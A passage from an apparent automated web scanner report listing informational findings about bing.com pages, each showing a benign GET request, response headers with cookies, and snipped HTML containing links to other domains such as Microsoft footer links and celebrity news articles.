P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:12:43 GMT
Connection: close
Content-Length: 1438

<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407563&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252fvideos%252fbrowse&amp;lc=1033&amp;id=264960" onmousedown="return si_T('&amp;ID=FD.FD.1,4.1')"><span id="sw_tliw">
...[SNIP]...
</a> &#xb7; <a href="http://go.microsoft.com/fwlink/?LinkID=191371" onmousedown="return si_T('&amp;ID=FD.FD.1,9.1')"><span>
...[SNIP]...

22.381. http://www.bing.com/images/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /images/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62488
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=ECC83C7DA0034AEABA343EF0044328D4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8116a169827248a2a4de6df0d9741c2b; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,61.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,63.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,74.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,76.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,78.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,80.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,82.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808550.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,84.1')">Help</a> | </li><li><a href="http://feedback.live.com/default.aspx?productkey=wlsearchimage&amp;backurl=/images/search.aspx?q=" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,86.1')">Tell us what you think</a>
...[SNIP]...

22.382. http://www.bing.com/local/ypdefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /local/ypdefault.aspx?cobrand=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58592
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 19:09:19 GMT
Last-Modified: Sun, 30 Jan 2011 17:09:19 GMT
X-BM-TraceID: 61c0a5daf9364d5eae29d87a4b59df08
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001611
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:19 GMT
Connection: close
Set-Cookie: BID=9a3c455b03a34c399ff347ddebe9c0da; path=/local
Set-Cookie: CID=2ce82b4bde284df69608cff257d735cf; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=1/30/2011 5:09:19 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _SS=SID=977701F1155A45C48694B30BF27CA1EE; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca384c53d8d3044e9a9f505bd01d98b5d; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...
<link id="canonicalUrl" rel="canonical" href="http://www.bing.com/local/ypdefault.aspx?catid=10000" />
   <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110113.409" />


<style type="text/css">
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,65.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,67.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,79.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,81.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,83.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,85.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,87.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,89.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fypdefault.aspx%3fcobrand%3d1" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,91.1')">Tell us what you think</a>
...[SNIP]...

22.383. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /maps/?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 24bb939fac60446db081924e1bf5bbc9
X-Ve-Server: EWR-01606-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001606
Date: Sun, 30 Jan 2011 17:06:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=F8325A831307499DABEC75E3079FEA02; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb22853f0a0c2423d98b0be5f0da6250a; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Content-Length: 117376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407177&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%253fq%253d&amp;lc=1033&amp;id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&amp;ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,49.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,57.1')">About our ads</a>
...[SNIP]...

22.384. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /maps/default.aspx?FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 196836b1dbd7411b8a6488298a68d1f6
X-Ve-Server: EWR-01609-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001609
Date: Sun, 30 Jan 2011 17:07:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=EA44C2EB561E4EFDAA629E61353FEC6D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb612a811dc1349a5bd4844fe05a12b08; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Content-Length: 117533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407222&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fdefault.aspx%253fFORM%253dMSNNAV&amp;lc=1033&amp;id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&amp;ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,49.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,57.1')">About our ads</a>
...[SNIP]...

22.385. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /maps/explore/?org=aj&FORM=Z9LH9 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43758
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01611
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001611
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:12 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=0B356F144E32438C91C61B8332E2BD10; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c98b20ec4fc584412a25a5a2271c0db7e; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407232&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fexplore%252f%253forg%253daj%2526FORM%253dZ9LH9&amp;lc=1033&amp;id=264960" onclick="if(FrontDoorLinkHandler)return(FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&amp;ID=FD,9.1')">Sign in</a>
...[SNIP]...

22.386. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61044
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:04:12 GMT
Connection: close
Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,212.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,214.1')">Hotmail</a>
...[SNIP]...
<p class="SignInLink">To sign up for news alerts, you need to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407052&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dozzy%252bosbourne%252bjustin%252bbieber%2526form%253dmsnhpm%2526alert_showform%253d1&amp;lc=1033&amp;id=264960" onmousedown="return si_T('&amp;ID=news,721.1')">sign in</a>
...[SNIP]...
<p class="SignUpLink">Don't have a Windows Live ID? <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296407052&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dozzy%252bosbourne%252bjustin%252bbieber%2526form%253dmsnhpm%2526alert_showform%253d1&amp;lc=1033&amp;id=264960" onmousedown="return si_T('&amp;ID=news,721.2')">Sign up</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=news,418.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=news,420.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=news,422.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=news,424.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=news,426.1')">About our ads</a>
...[SNIP]...
<div class="sn_img"><a href="http://www.okmagazine.com/2011/01/justin-bieber-changes-his-hair-looks-like-robert-pattinson/" onmousedown="return si_T('&amp;ID=news,59.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fcdn02.okcdn.okmagazine.com%2fwp-content%2fuploads%2f2011%2f01%2fJustin_Bieber_Jan28newsnea1.jpg&amp;id=12D00762BC2D388FC2CCEA27C7C
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/entertainment/2011/01/30/ozzy-osbourne-and-justin-bieber-to-do-superbowl-commercial/" onmousedown="return si_T('&amp;ID=news,52.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.people.com/people/article/0,,20461627,00.html?xid=rss-topheadlines" onmousedown="return si_T('&amp;ID=news,54.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.mtv.com/news/articles/1656785/justin-bieber-ozzy-osbourne-super-bowl.jhtml" onmousedown="return si_T('&amp;ID=news,56.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.nationalledger.com/lifestyle/article_272637545.shtml" onmousedown="return si_T('&amp;ID=news,73.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.nationalledger.com%2fartman%2fuploads%2fjustin-bb.jpg&amp;id=20B6BA9F07805D1AA5EF36F4E3BD2F4C" title="Super Bowl Ads 2011: Ozz
...[SNIP]...
<div class="sn_hd"><a href="http://www.usmagazine.com/moviestvmusic/news/justin-bieber-and-ozzy-osbourne-join-forces-for-fun-super-bowl-ad-2011281" onmousedown="return si_T('&amp;ID=news,66.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.azcentral.com/ent/celeb/articles/2011/01/28/20110128justin-bieber-ozzy-team-up-best-buy-super-bowl-ad.html" onmousedown="return si_T('&amp;ID=news,68.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.thestreet.com/story/10986263/1/justin-bieber-channels-his-inner-tech-geek-on-set-for-best-buys-inaugural-big-game-commercial-courtesy-of-christopher-polk-getty-images.html" onmousedown="return si_T('&amp;ID=news,70.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.associatedcontent.com/content_recommend.shtml?recommend=true&amp;content_type=article&amp;content_type_id=7693654" onmousedown="return si_T('&amp;ID=news,80.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.nydailynews.com/entertainment/2011/01/28/2011-01-28_bieber_ozzy_osbourne_team_up_for_super_bowl_ad.html" onmousedown="return si_T('&amp;ID=news,85.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fassets.nydailynews.com%2fimg%2f2011%2f01%2f29%2falg_osbourne_bieber.jpg&amp;id=0B80E103D78E7BF5BA9E5C81769039F9" title="Justin Bie
...[SNIP]...
<div class="sn_hd"><a href="http://www.nydailynews.com/entertainment/2011/01/28/2011-01-28_bieber_ozzy_osbourne_team_up_for_super_bowl_ad.html" onmousedown="return si_T('&amp;ID=news,84.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.popeater.com/2011/01/28/justin-bieber-ozzy-osbourne-ad/" onmousedown="return si_T('&amp;ID=news,90.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.blogcdn.com%2fwww.popeater.com%2fmedia%2f2011%2f01%2f1296231154593.jpg&amp;id=7C67EE3CA7C2AC57A3F38656C861866F" title="Justin
...[SNIP]...
<div class="sn_hd"><a href="http://www.popeater.com/2011/01/28/justin-bieber-ozzy-osbourne-ad/" onmousedown="return si_T('&amp;ID=news,89.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://blog.syracuse.com/entertainment/2011/01/2011_superbowl_commercial_cele.html" onmousedown="return si_T('&amp;ID=news,95.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmedia.syracuse.com%2fentertainment%2fphoto%2f9229989-large.jpg&amp;id=445C6430C19C344A77EC266588F88CB6" title="Super Bowl commerci
...[SNIP]...
<div class="sn_hd"><a href="http://blog.syracuse.com/entertainment/2011/01/2011_superbowl_commercial_cele.html" onmousedown="return si_T('&amp;ID=news,94.1')" >Super Bowl commercial celebs: <strong>
...[SNIP]...
<div class="sn_img"><a href="http://voices.washingtonpost.com/celebritology/2011/01/justin_bieber_and_ozzy_osbourn.html?wprss=celebritology" onmousedown="return si_T('&amp;ID=news,100.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fblog.washingtonpost.com%2fclicktrack%2fbieber.JPG&amp;id=DEC74DE740F3B3C7EBA65FACBB8C40B7" title="Justin Bieber and Ozzy Osbourne
...[SNIP]...
<div class="sn_hd"><a href="http://voices.washingtonpost.com/celebritology/2011/01/justin_bieber_and_ozzy_osbourn.html?wprss=celebritology" onmousedown="return si_T('&amp;ID=news,99.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://sports.espn.go.com/espn/page2/story?id=6073772" onmousedown="return si_T('&amp;ID=news,3.1')" >Tuesday is 'Nipplegate' anniversary</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/entertainment/2011/01/30/ozzy-osbourne-and-justin-bieber-to-do-superbowl-commercial/" onmousedown="return si_T('&amp;ID=news,8.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.carrollcountytimes.com/news/local/performers-with-carroll-county-roots-rack-up-hits-on-youtube/article_52283146-2bfb-11e0-963d-001cc4c002e0.html?photo=1" onmousedown="return si_T('&amp;ID=news,12.1')" >Performers with Carroll County roots rack up hits on YouTube</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.pbpulse.com/gossip/celeb-stalker/2011/01/29/justin-bieber-ozzy-osbourne-in-super-bowl-ad/" onmousedown="return si_T('&amp;ID=news,17.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.twincities.com/entertainment/ci_17229903" onmousedown="return si_T('&amp;ID=news,22.1')" >Odd couple at the Super Bowl</a>
